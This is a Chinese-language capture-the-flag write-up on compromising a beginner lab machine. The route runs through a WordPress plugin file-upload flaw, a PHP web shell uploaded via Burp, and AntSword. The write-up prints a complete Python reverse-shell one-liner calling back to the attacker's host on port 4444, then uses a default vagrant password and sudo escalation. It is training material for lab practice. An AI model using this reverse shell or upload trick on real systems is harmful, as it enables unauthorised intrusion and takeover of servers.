blogger靶机

难度：初学者

思路：扫目录→发现目录遍历→发现一个wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag

首先扫描网络获取靶机ip

arp-scan -l

接着nmap扫描这个ip，看到开启80、22端口

nmap -sV 192.168.101.50

访问80端口，看到使用wordpress搭建

使用wpscan扫描一下无结果

使用dirb扫一下目录，得到了4个目录

dirb http://192.168.101.50 

访问一下，发现存在目录遍历

查找到这个地址，

用wpscan扫描一下，没有发现什么有价值的东西

随便点开一个看看，f12审查元素，发现一个wordpress插件

查找一下有没有漏洞，发现存在任意文件上传

上传图片马，burp抓包改后缀为php

上传成功，返回了上传路径

蚁剑成功连接

发现不是root权限

接下来进行提权，再次上传可以执行系统命令的文件，注意改成get方式提交，post也可以不过需要hackbar工具，这里为了方便使用get

使用python反弹shell

a=python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.101.52",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

成功反弹shell

获取一个交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

来到/home目录发现三个用户目录

查看james发现user.flag

无法查看其中信息，估计是没有权限

查看/etc/passwd发现了这三个用户（爆破获取vagrant密码是vagrant）其实是看到网上教程得到的，其实这里不会

切换到vagrant用户，发现可以执行所用命令

直接sudo su提权，成功得到user.txt

切换到root目录下成功获取root.txt

base64解码